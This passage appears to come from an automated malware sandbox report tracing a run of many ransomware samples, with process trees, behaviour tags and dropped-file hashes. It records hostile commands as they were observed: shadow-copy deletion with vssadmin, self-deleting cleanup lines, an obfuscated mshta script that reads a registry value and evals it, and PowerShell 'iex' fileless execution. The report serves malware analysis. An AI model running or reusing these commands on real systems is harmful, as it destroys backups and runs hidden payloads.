                                                                            • C:\Users\Admin\Desktop\00291\Trojan-Ransom.Win32.Purgen.dj-2815c8cdb02003298f7959fd1cf6eed893de6652f3861a6a2e3e5744b8ac9234.exe
                                                                              Trojan-Ransom.Win32.Purgen.dj-2815c8cdb02003298f7959fd1cf6eed893de6652f3861a6a2e3e5744b8ac9234.exe
                                                                              2⤵
                                                                              • Executes dropped EXE
                                                                              • Suspicious use of SetThreadContext
                                                                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                              PID:1940
                                                                              • C:\Users\Admin\Desktop\00291\Trojan-Ransom.Win32.Purgen.dj-2815c8cdb02003298f7959fd1cf6eed893de6652f3861a6a2e3e5744b8ac9234.exe
                                                                                Trojan-Ransom.Win32.Purgen.dj-2815c8cdb02003298f7959fd1cf6eed893de6652f3861a6a2e3e5744b8ac9234.exe
                                                                                3⤵
                                                                                • Executes dropped EXE
                                                                                • Drops desktop.ini file(s)
                                                                                • Drops file in Program Files directory
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:2528
                                                                                • C:\Windows\SysWOW64\vssadmin.exe
                                                                                  vssadmin.exe Delete Shadows /All /Quiet
                                                                                  4⤵
                                                                                  • Interacts with shadow copies
                                                                                  PID:2676
                                                                            • C:\Users\Admin\Desktop\00291\Trojan-Ransom.Win32.SageCrypt.e-372df334d3c39186e880668677d75a5eaf714c94803ec4f7997a3e55789c3cf3.exe
                                                                              Trojan-Ransom.Win32.SageCrypt.e-372df334d3c39186e880668677d75a5eaf714c94803ec4f7997a3e55789c3cf3.exe
                                                                              2⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              • Sets desktop wallpaper using registry
                                                                              • System Location Discovery: System Language Discovery
                                                                              • Modifies Control Panel
                                                                              • Modifies data under HKEY_USERS
                                                                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                              • Suspicious use of UnmapMainImage
                                                                              PID:912
                                                                              • C:\Users\Admin\Desktop\00291\Trojan-Ransom.Win32.SageCrypt.e-372df334d3c39186e880668677d75a5eaf714c94803ec4f7997a3e55789c3cf3.exe
                                                                                "C:\Users\Admin\Desktop\00291\Trojan-Ransom.Win32.SageCrypt.e-372df334d3c39186e880668677d75a5eaf714c94803ec4f7997a3e55789c3cf3.exe" g
                                                                                3⤵
                                                                                • Executes dropped EXE
                                                                                • System Location Discovery: System Language Discovery
                                                                                • Suspicious use of UnmapMainImage
                                                                                PID:2100
                                                                              • C:\Windows\SysWOW64\vssadmin.exe
                                                                                "C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet
                                                                                3⤵
                                                                                • System Location Discovery: System Language Discovery
                                                                                • Interacts with shadow copies
                                                                                PID:2328
                                                                              • C:\Windows\SysWOW64\vssadmin.exe
                                                                                "C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet
                                                                                3⤵
                                                                                • System Location Discovery: System Language Discovery
                                                                                • Interacts with shadow copies
                                                                                PID:3728
                                                                            • C:\Users\Admin\Desktop\00291\Trojan-Ransom.Win32.Shade.nbv-69ba6ee95db4f02439a183c4d3f9dae71b9b0a4071c82076486573b446b38922.exe
                                                                              Trojan-Ransom.Win32.Shade.nbv-69ba6ee95db4f02439a183c4d3f9dae71b9b0a4071c82076486573b446b38922.exe
                                                                              2⤵
                                                                              • Executes dropped EXE
                                                                              • System Location Discovery: System Language Discovery
                                                                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                              PID:768
                                                                            • C:\Users\Admin\Desktop\00291\Trojan-Ransom.Win32.Shade.ncm-0be9527b45f515ced879988770846c828e3be604ccaa14b6a9ce6e7f2fc72c0a.exe
                                                                              Trojan-Ransom.Win32.Shade.ncm-0be9527b45f515ced879988770846c828e3be604ccaa14b6a9ce6e7f2fc72c0a.exe
                                                                              2⤵
                                                                              • Executes dropped EXE
                                                                              • Drops file in Windows directory
                                                                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:2580
                                                                            • C:\Users\Admin\Desktop\00291\Trojan-Ransom.Win32.Shade.ndg-a6471b8ea3b85c148a224157126c0ea3db8e803af5f93daa7deb4d63afc38d90.exe
                                                                              Trojan-Ransom.Win32.Shade.ndg-a6471b8ea3b85c148a224157126c0ea3db8e803af5f93daa7deb4d63afc38d90.exe
                                                                              2⤵
                                                                              • Executes dropped EXE
                                                                              • Adds Run key to start application
                                                                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                              PID:2144
                                                                              • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
                                                                                "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\FB84AA7D.rtf"
                                                                                3⤵
                                                                                • Enumerates connected drives
                                                                                • Suspicious behavior: AddClipboardFormatListener
                                                                                • Suspicious use of FindShellTrayWindow
                                                                                • Suspicious use of SetWindowsHookEx
                                                                                PID:1612
                                                                            • C:\Users\Admin\Desktop\00291\Trojan-Ransom.Win32.Shade.ndl-bcdbaf591fdaea9cf391c369b626a2d73a458759686db76e9b3ce857458eefb4.exe
                                                                              Trojan-Ransom.Win32.Shade.ndl-bcdbaf591fdaea9cf391c369b626a2d73a458759686db76e9b3ce857458eefb4.exe
                                                                              2⤵
                                                                              • Executes dropped EXE
                                                                              • System Location Discovery: System Language Discovery
                                                                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                              PID:1536
                                                                            • C:\Users\Admin\Desktop\00291\Trojan-Ransom.Win32.Shade.nep-ae1f435b9f0a0bbfc9cd2659520ba98b6a29d5961d142e4b36ba537583596b36.exe
                                                                              Trojan-Ransom.Win32.Shade.nep-ae1f435b9f0a0bbfc9cd2659520ba98b6a29d5961d142e4b36ba537583596b36.exe
                                                                              2⤵
                                                                              • Executes dropped EXE
                                                                              • System Location Discovery: System Language Discovery
                                                                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                              PID:2020
                                                                            • C:\Users\Admin\Desktop\00291\Trojan-Ransom.Win32.Wanna.c-b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25.exe
                                                                              Trojan-Ransom.Win32.Wanna.c-b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25.exe
                                                                              2⤵
                                                                              • Executes dropped EXE
                                                                              • Sets desktop wallpaper using registry
                                                                              • System Location Discovery: System Language Discovery
                                                                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                              • Suspicious use of SetWindowsHookEx
                                                                              PID:292
                                                                            • C:\Users\Admin\Desktop\00291\Trojan-Ransom.Win32.Wanna.zbu-2d80b45f96384837870a4f1c07a24b2bbecce0c17b7c4861f2bbc44ea64e9415.exe
                                                                              Trojan-Ransom.Win32.Wanna.zbu-2d80b45f96384837870a4f1c07a24b2bbecce0c17b7c4861f2bbc44ea64e9415.exe
                                                                              2⤵
                                                                              • Executes dropped EXE
                                                                              PID:2308
                                                                            • C:\Users\Admin\Desktop\00291\Trojan-Ransom.Win32.Zerber.dct-67171b709fbfbf9280e0dcb30105b8b6512ae9da45cbab131753abc28765ea02.exe
                                                                              Trojan-Ransom.Win32.Zerber.dct-67171b709fbfbf9280e0dcb30105b8b6512ae9da45cbab131753abc28765ea02.exe
                                                                              2⤵
                                                                              • Adds policy Run key to start application
                                                                              • Drops startup file
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              • Adds Run key to start application
                                                                              • System Location Discovery: System Language Discovery
                                                                              • Modifies Control Panel
                                                                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              • Suspicious use of UnmapMainImage
                                                                              PID:2936
                                                                              • C:\Users\Admin\AppData\Roaming\{C7CD5A05-A6B9-B06B-3FDB-EB4CCFC45048}\verifier.exe
                                                                                "C:\Users\Admin\AppData\Roaming\{C7CD5A05-A6B9-B06B-3FDB-EB4CCFC45048}\verifier.exe"
                                                                                3⤵
                                                                                • Executes dropped EXE
                                                                                • System Location Discovery: System Language Discovery
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                • Suspicious use of UnmapMainImage
                                                                                PID:2644
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                /d /c taskkill /t /f /im "Trojan-Ransom.Win32.Zerber.dct-67171b709fbfbf9280e0dcb30105b8b6512ae9da45cbab131753abc28765ea02.exe" > NUL & ping -n 1 127.0.0.1 > NUL & del "C:\Users\Admin\Desktop\00291\Trojan-Ransom.Win32.Zerber.dct-67171b709fbfbf9280e0dcb30105b8b6512ae9da45cbab131753abc28765ea02.exe" > NUL
                                                                                3⤵
                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                PID:2372
                                                                            • C:\Users\Admin\Desktop\00291\Trojan-Ransom.Win32.Zerber.dsv-5a3a26fa07039c50c1c4fcf23067ea57ccd9648d75c7396d067c5ea86a05e637.exe
                                                                              Trojan-Ransom.Win32.Zerber.dsv-5a3a26fa07039c50c1c4fcf23067ea57ccd9648d75c7396d067c5ea86a05e637.exe
                                                                              2⤵
                                                                              • Adds policy Run key to start application
                                                                              • Drops startup file
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              • Adds Run key to start application
                                                                              • System Location Discovery: System Language Discovery
                                                                              • Modifies Control Panel
                                                                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              • Suspicious use of UnmapMainImage
                                                                              PID:2880
                                                                              • C:\Users\Admin\AppData\Roaming\{C7CD5A05-A6B9-B06B-3FDB-EB4CCFC45048}\winrs.exe
                                                                                "C:\Users\Admin\AppData\Roaming\{C7CD5A05-A6B9-B06B-3FDB-EB4CCFC45048}\winrs.exe"
                                                                                3⤵
                                                                                • Executes dropped EXE
                                                                                • System Location Discovery: System Language Discovery
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                • Suspicious use of UnmapMainImage
                                                                                PID:2916
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                /d /c taskkill /t /f /im "Trojan-Ransom.Win32.Zerber.dsv-5a3a26fa07039c50c1c4fcf23067ea57ccd9648d75c7396d067c5ea86a05e637.exe" > NUL & ping -n 1 127.0.0.1 > NUL & del "C:\Users\Admin\Desktop\00291\Trojan-Ransom.Win32.Zerber.dsv-5a3a26fa07039c50c1c4fcf23067ea57ccd9648d75c7396d067c5ea86a05e637.exe" > NUL
                                                                                3⤵
                                                                                • System Location Discovery: System Language Discovery
                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                PID:2816
                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                  taskkill /t /f /im "Trojan-Ransom.Win32.Zerber.dsv-5a3a26fa07039c50c1c4fcf23067ea57ccd9648d75c7396d067c5ea86a05e637.exe"
                                                                                  4⤵
                                                                                  • Kills process with taskkill
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:3020
                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                  ping -n 1 127.0.0.1
                                                                                  4⤵
                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                  • Runs ping.exe
                                                                                  PID:1240
                                                                            • C:\Users\Admin\Desktop\00291\Trojan-Ransom.Win32.Zerber.ecmz-af398b8ce35aee1777c391003a7b690638c1b2d5a1476665d090446a24ce6402.exe
                                                                              Trojan-Ransom.Win32.Zerber.ecmz-af398b8ce35aee1777c391003a7b690638c1b2d5a1476665d090446a24ce6402.exe
                                                                              2⤵
                                                                              • Executes dropped EXE
                                                                              • Suspicious use of SetThreadContext
                                                                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                              • Suspicious use of SetWindowsHookEx
                                                                              PID:2792
                                                                              • C:\Users\Admin\Desktop\00291\Trojan-Ransom.Win32.Zerber.ecmz-af398b8ce35aee1777c391003a7b690638c1b2d5a1476665d090446a24ce6402.exe
                                                                                Trojan-Ransom.Win32.Zerber.ecmz-af398b8ce35aee1777c391003a7b690638c1b2d5a1476665d090446a24ce6402.exe
                                                                                3⤵
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:3272
                                                                            • C:\Users\Admin\Desktop\00291\Trojan-Ransom.Win32.Zerber.edjj-fb6347f50299331f9b72e32e65799af6e471a3e33d3b76e5b1d57635b7499ba3.exe
                                                                              Trojan-Ransom.Win32.Zerber.edjj-fb6347f50299331f9b72e32e65799af6e471a3e33d3b76e5b1d57635b7499ba3.exe
                                                                              2⤵
                                                                              • Executes dropped EXE
                                                                              • Suspicious use of SetThreadContext
                                                                              • System Location Discovery: System Language Discovery
                                                                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                              • Suspicious use of SetWindowsHookEx
                                                                              PID:2764
                                                                              • C:\Users\Admin\Desktop\00291\Trojan-Ransom.Win32.Zerber.edjj-fb6347f50299331f9b72e32e65799af6e471a3e33d3b76e5b1d57635b7499ba3.exe
                                                                                Trojan-Ransom.Win32.Zerber.edjj-fb6347f50299331f9b72e32e65799af6e471a3e33d3b76e5b1d57635b7499ba3.exe
                                                                                3⤵
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:752
                                                                            • C:\Users\Admin\Desktop\00291\Trojan-Ransom.Win32.Zerber.uwo-916fa966e53c09fcdfa07f673c0dde05fe506baa513ee695aeac75cbf2bead31.exe
                                                                              Trojan-Ransom.Win32.Zerber.uwo-916fa966e53c09fcdfa07f673c0dde05fe506baa513ee695aeac75cbf2bead31.exe
                                                                              2⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              • Suspicious use of SetThreadContext
                                                                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                              • Suspicious behavior: MapViewOfSection
                                                                              PID:2760
                                                                              • C:\Users\Admin\Desktop\00291\Trojan-Ransom.Win32.Zerber.uwo-916fa966e53c09fcdfa07f673c0dde05fe506baa513ee695aeac75cbf2bead31.exe
                                                                                Trojan-Ransom.Win32.Zerber.uwo-916fa966e53c09fcdfa07f673c0dde05fe506baa513ee695aeac75cbf2bead31.exe
                                                                                3⤵
                                                                                • Executes dropped EXE
                                                                                PID:2768
                                                                            • C:\Users\Admin\Desktop\00291\Trojan-Ransom.Win32.Zerber.wtl-b16aaf3222fe784e6b6ad691354550dc90b825b40d96f414396ced60e2c08d58.exe
                                                                              Trojan-Ransom.Win32.Zerber.wtl-b16aaf3222fe784e6b6ad691354550dc90b825b40d96f414396ced60e2c08d58.exe
                                                                              2⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              • Suspicious use of SetThreadContext
                                                                              • System Location Discovery: System Language Discovery
                                                                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                              • Suspicious behavior: MapViewOfSection
                                                                              PID:2660
                                                                              • C:\Users\Admin\Desktop\00291\Trojan-Ransom.Win32.Zerber.wtl-b16aaf3222fe784e6b6ad691354550dc90b825b40d96f414396ced60e2c08d58.exe
                                                                                Trojan-Ransom.Win32.Zerber.wtl-b16aaf3222fe784e6b6ad691354550dc90b825b40d96f414396ced60e2c08d58.exe
                                                                                3⤵
                                                                                • Executes dropped EXE
                                                                                PID:1752
                                                                            • C:\Users\Admin\Desktop\00291\UDS-Trojan-Ransom.Win32.CryptXXX.sb-5d49361cc6c77f2861fad9e464bea96c6e2b036dfb33d1cefc64c977ffd917b3.exe
                                                                              UDS-Trojan-Ransom.Win32.CryptXXX.sb-5d49361cc6c77f2861fad9e464bea96c6e2b036dfb33d1cefc64c977ffd917b3.exe
                                                                              2⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              • System Location Discovery: System Language Discovery
                                                                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                              PID:2656
                                                                              • C:\Users\Admin\AppData\Local\Temp\ddacabfcdbhi.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\ddacabfcdbhi.exe 8-8-8-6-1-2-0-2-2-3-4 J0hBPjw0MzYeLE9NOkhDQzswHi1LQUxPR0xKR0Q7Lx0rPEFLTkhCPTMyMRwnO0E+PC4gLU5PSzxNO05eR0Q7MjMtGCdLP1FURVBdUk5ENWBuc246LS1wbm4mPD9SSS1STU0pOUhIKEhMRk0eLD9EQTtFSEI9Hi1BLTUsKDIyLzczHixAKjUvLTQeL0IxOikpGCc+MzstLx4sQC01JSsfLVBQTUFRO0xXSlFHVj9BVjkYJ0hMTkJVQVJcQU1EOTcfLVBQTUFRO0xXSEBLRTtSUxwnPVA/XlNSSjsdKz1QPVlCS0RKR0tBNRgnQk5RVF1AT0tPSz1MPDMgLVJFPUZDUUlUXVVQSjocJ05FNzEeL0JRLjkYJ0pPTVJJS0NcUz1EO0lMQ0lLP0RBTUpENx8tSVFdT1FGTEFHRDt0cHNiHCdKPU5UUE5HTERbTUs9TF5CQVdROi4YJ0BDQ0NYOy8dK0FLVz5YTEFLR0BbPUY7TFhOVENCOmJZZGtfHy1ETVVLSEc5PFlITj0wLjUqKSkoKDgxLi8wLxwnTEFHRDsxMjA0MyotMS0wHi9CTVRKREc5Pl5SSUtDOi8nKygpMS4xMygvNisqMiswKFBL
                                                                                3⤵
                                                                                • Executes dropped EXE
                                                                                PID:1880
                                                                                • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                                                  wmic /output:C:\Users\Admin\AppData\Local\Temp\81731868539.txt bios get serialnumber
                                                                                  4⤵
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:1692
                                                                                • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                                                  wmic /output:C:\Users\Admin\AppData\Local\Temp\81731868539.txt bios get version
                                                                                  4⤵
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:3780
                                                                                • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                                                  wmic /output:C:\Users\Admin\AppData\Local\Temp\81731868539.txt bios get version
                                                                                  4⤵
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:3472
                                                                                • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                                                  wmic /output:C:\Users\Admin\AppData\Local\Temp\81731868539.txt bios get version
                                                                                  4⤵
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:348
                                                                                • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                                                  wmic /output:C:\Users\Admin\AppData\Local\Temp\81731868539.txt bios get version
                                                                                  4⤵
                                                                                    PID:3660
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1880 -s 368
                                                                                    4⤵
                                                                                    • Loads dropped DLL
                                                                                    • Program crash
                                                                                    PID:3220
                                                                              • C:\Users\Admin\Desktop\00291\UDS-Trojan-Ransom.Win32.Zerber.sb-2a50275636b7a3336f47584dc68ca3d34429928d3e5ad9f8f3643d41583c93be.exe
                                                                                UDS-Trojan-Ransom.Win32.Zerber.sb-2a50275636b7a3336f47584dc68ca3d34429928d3e5ad9f8f3643d41583c93be.exe
                                                                                2⤵
                                                                                • Executes dropped EXE
                                                                                • Loads dropped DLL
                                                                                • Suspicious use of SetThreadContext
                                                                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                • Suspicious behavior: MapViewOfSection
                                                                                PID:2972
                                                                                • C:\Users\Admin\Desktop\00291\UDS-Trojan-Ransom.Win32.Zerber.sb-2a50275636b7a3336f47584dc68ca3d34429928d3e5ad9f8f3643d41583c93be.exe
                                                                                  UDS-Trojan-Ransom.Win32.Zerber.sb-2a50275636b7a3336f47584dc68ca3d34429928d3e5ad9f8f3643d41583c93be.exe
                                                                                  3⤵
                                                                                    PID:3716
                                                                              • C:\Windows\system32\taskmgr.exe
                                                                                "C:\Windows\system32\taskmgr.exe" /4
                                                                                1⤵
                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                • Suspicious use of FindShellTrayWindow
                                                                                • Suspicious use of SendNotifyMessage
                                                                                PID:2076
                                                                              • C:\Windows\syswow64\svchost.exe
                                                                                "C:\Windows\syswow64\svchost.exe"
                                                                                1⤵
                                                                                • Modifies WinLogon for persistence
                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:2572
                                                                              • C:\Windows\system32\vssvc.exe
                                                                                C:\Windows\system32\vssvc.exe
                                                                                1⤵
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:2468
                                                                              • C:\Windows\system32\mshta.exe
                                                                                "C:\Windows\system32\mshta.exe" javascript:Wuac7KI="6";n1f=new%20ActiveXObject("WScript.Shell");tM5lMoo="ijWO";m16MWf=n1f.RegRead("HKLM\\software\\Wow6432Node\\TZgNNY8z6k\\BiVmup");JRXR7j="4QVjIs";eval(m16MWf);iEZHP95fp="Is3k8";
                                                                                1⤵
                                                                                • Process spawned unexpected child process
                                                                                PID:2200
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:ebyhzzxr
                                                                                  2⤵
                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                  • Drops file in System32 directory
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:3920
                                                                                  • C:\Windows\SysWOW64\regsvr32.exe
                                                                                    regsvr32.exe
                                                                                    3⤵
                                                                                      PID:1512
                                                                                      • C:\Windows\SysWOW64\regsvr32.exe
                                                                                        "C:\Windows\SysWOW64\regsvr32.exe"
                                                                                        4⤵
                                                                                          PID:5056
                                                                                  • C:\Windows\system32\AUDIODG.EXE
                                                                                    C:\Windows\system32\AUDIODG.EXE 0x480
                                                                                    1⤵
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:980
                                                                                  • C:\Windows\system32\conhost.exe
                                                                                    \??\C:\Windows\system32\conhost.exe "1783842209117441584462370967-183877669-6538749921863835938112357163765461973"
                                                                                    1⤵
                                                                                      PID:2996
                                                                                    • C:\Windows\system32\msiexec.exe
                                                                                      C:\Windows\system32\msiexec.exe /V
                                                                                      1⤵
                                                                                      • Loads dropped DLL
                                                                                      • Enumerates connected drives
                                                                                      • Drops file in Program Files directory
                                                                                      • Drops file in Windows directory
                                                                                      • Modifies data under HKEY_USERS
                                                                                      • Modifies registry class
                                                                                      PID:3708
                                                                                      • C:\Windows\syswow64\MsiExec.exe
                                                                                        C:\Windows\syswow64\MsiExec.exe -Embedding 7131B671F85CDF9F8CB6D9CF4647D4DB
                                                                                        2⤵
                                                                                        • Loads dropped DLL
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:3504
                                                                                      • C:\Windows\syswow64\MsiExec.exe
                                                                                        C:\Windows\syswow64\MsiExec.exe -Embedding 563881C4BADF545E6E2EDC2424DEB78D
                                                                                        2⤵
                                                                                        • Loads dropped DLL
                                                                                        PID:2896
                                                                                      • C:\Windows\syswow64\MsiExec.exe
                                                                                        C:\Windows\syswow64\MsiExec.exe -Embedding 91863F80DB5FE196931729E8FCD9D022
                                                                                        2⤵
                                                                                          PID:4056
                                                                                        • C:\Windows\syswow64\MsiExec.exe
                                                                                          C:\Windows\syswow64\MsiExec.exe -Embedding C763A2F3270EA5C11D04C72FF4C05FDC M Global\MSI0000
                                                                                          2⤵
                                                                                            PID:1520
                                                                                        • C:\Windows\Explorer.EXE
                                                                                          "C:\Windows\Explorer.EXE"
                                                                                          1⤵
                                                                                          • Boot or Logon Autostart Execution: Active Setup
                                                                                          • Drops desktop.ini file(s)
                                                                                          • Modifies Internet Explorer settings
                                                                                          • Modifies registry class
                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                          • Suspicious use of SendNotifyMessage
                                                                                          PID:2208
                                                                                          • C:\Users\Admin\AppData\Roaming\{C7CD5A05-A6B9-B06B-3FDB-EB4CCFC45048}\winrs.exe
                                                                                            "C:\Users\Admin\AppData\Roaming\{C7CD5A05-A6B9-B06B-3FDB-EB4CCFC45048}\winrs.exe"
                                                                                            2⤵
                                                                                            • Suspicious use of UnmapMainImage
                                                                                            PID:1256
                                                                                          • C:\Users\Admin\AppData\Roaming\{C7CD5A05-A6B9-B06B-3FDB-EB4CCFC45048}\verifier.exe
                                                                                            "C:\Users\Admin\AppData\Roaming\{C7CD5A05-A6B9-B06B-3FDB-EB4CCFC45048}\verifier.exe"
                                                                                            2⤵
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            • Suspicious use of UnmapMainImage
                                                                                            PID:3740
                                                                                          • C:\Windows\system32\taskmgr.exe
                                                                                            "C:\Windows\system32\taskmgr.exe" /4
                                                                                            2⤵
                                                                                              PID:6516
                                                                                          • C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Setup.exe
                                                                                            "C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Setup.exe" -Embedding
                                                                                            1⤵
                                                                                            • Loads dropped DLL
                                                                                            PID:208
                                                                                          • C:\Windows\SysWOW64\DllHost.exe
                                                                                            C:\Windows\SysWOW64\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}
                                                                                            1⤵
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:3464
                                                                                          • C:\Windows\SysWOW64\DllHost.exe
                                                                                            C:\Windows\SysWOW64\DllHost.exe /Processid:{3F6B5E16-092A-41ED-930B-0B4125D91D4E}
                                                                                            1⤵
                                                                                              PID:204
                                                                                            • C:\Windows\system32\msiexec.exe
                                                                                              C:\Windows\system32\msiexec.exe /V
                                                                                              1⤵
                                                                                                PID:4648
                                                                                                • C:\Windows\syswow64\MsiExec.exe
                                                                                                  C:\Windows\syswow64\MsiExec.exe -Embedding 33AD1529C20ED0201FC1C059B28E7BE1
                                                                                                  2⤵
                                                                                                    PID:5664
                                                                                                  • C:\Windows\syswow64\MsiExec.exe
                                                                                                    C:\Windows\syswow64\MsiExec.exe -Embedding 7186722781A8FEB7A1C947AD5BF134D7 M Global\MSI0000
                                                                                                    2⤵
                                                                                                      PID:8040
                                                                                                    • C:\Windows\syswow64\MsiExec.exe
                                                                                                      C:\Windows\syswow64\MsiExec.exe -Embedding A524F52281F832A7576E991749C4911B
                                                                                                      2⤵
                                                                                                        PID:8980
                                                                                                    • C:\Windows\SysWOW64\DllHost.exe
                                                                                                      C:\Windows\SysWOW64\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}
                                                                                                      1⤵
                                                                                                        PID:8184
                                                                                                      • C:\Windows\system32\DllHost.exe
                                                                                                        C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
                                                                                                        1⤵
                                                                                                          PID:3472
                                                                                                        • C:\Windows\system32\taskeng.exe
                                                                                                          taskeng.exe {6E046F42-FBD4-4047-9EEF-507D6FE800B9} S-1-5-21-2039016743-699959520-214465309-1000:PIDEURYY\Admin:Interactive:[1]
                                                                                                          1⤵
                                                                                                            PID:1544
                                                                                                            • C:\Users\Admin\AppData\Roaming\{C7CD5A05-A6B9-B06B-3FDB-EB4CCFC45048}\verifier.exe
                                                                                                              C:\Users\Admin\AppData\Roaming\{C7CD5A05-A6B9-B06B-3FDB-EB4CCFC45048}\verifier.exe
                                                                                                              2⤵
                                                                                                                PID:4272
                                                                                                              • C:\Users\Admin\AppData\Roaming\{C7CD5A05-A6B9-B06B-3FDB-EB4CCFC45048}\verifier.exe
                                                                                                                C:\Users\Admin\AppData\Roaming\{C7CD5A05-A6B9-B06B-3FDB-EB4CCFC45048}\verifier.exe
                                                                                                                2⤵
                                                                                                                  PID:7708
                                                                                                                • C:\Users\Admin\AppData\Roaming\alFSVWJB\fdzivafvd.exe
                                                                                                                  C:\Users\Admin\AppData\Roaming\alFSVWJB\fdzivafvd.exe
                                                                                                                  2⤵
                                                                                                                    PID:3388
                                                                                                                • C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Setup.exe
                                                                                                                  "C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Setup.exe" -Embedding
                                                                                                                  1⤵
                                                                                                                    PID:3876

                                                                                                                  Network

                                                                                                                  MITRE ATT&CK Enterprise v15

                                                                                                                  Replay Monitor

                                                                                                                  Loading Replay Monitor...

                                                                                                                  Downloads

                                                                                                                  • C:\Config.Msi\f787340.rbs

                                                                                                                    Filesize

                                                                                                                    11KB

                                                                                                                    MD5

                                                                                                                    ce25afe315988807ce28b1a6abc376c0

                                                                                                                    SHA1

                                                                                                                    442209dbadc71cfb8b7f2be634ef459fe47c821c

                                                                                                                    SHA256

                                                                                                                    f4e5c2f1b9a594d0b61b9fab443f39b4022affcd98abf903bbc127b2d3384a29

                                                                                                                    SHA512

                                                                                                                    8a34d611b7f6cc409577780572fcfb02450620a43d587d2464e5c05119e4e1f6e992008dbe9c5248437c542a0d45d01eb6b253fe51ba28c35bab01138ec05cb6

                                                                                                                  • C:\Config.Msi\f78734a.rbs

                                                                                                                    Filesize

                                                                                                                    695KB

                                                                                                                    MD5

                                                                                                                    f7a2a5b1c5e71d62607d969f34b7df77

                                                                                                                    SHA1

                                                                                                                    208c84dc9ae575faa5d92fa05512d4031a4a89ab

                                                                                                                    SHA256

                                                                                                                    4167dafb557ee4d6ba61c9cc54fe10d16efdb014541dcd6e01b851267567149f

                                                                                                                    SHA512

                                                                                                                    c3210d53327c1618cc3c4d7bdd6df0cd0fcb42e64d7d5ae2f1e681adf0ea5b07f04e8e5d03920c79d0da269de0db1c1c781cc4564226802194eca0ce69a6eac0

                                                                                                                  • C:\Config.Msi\f7986fe.rbs

                                                                                                                    Filesize

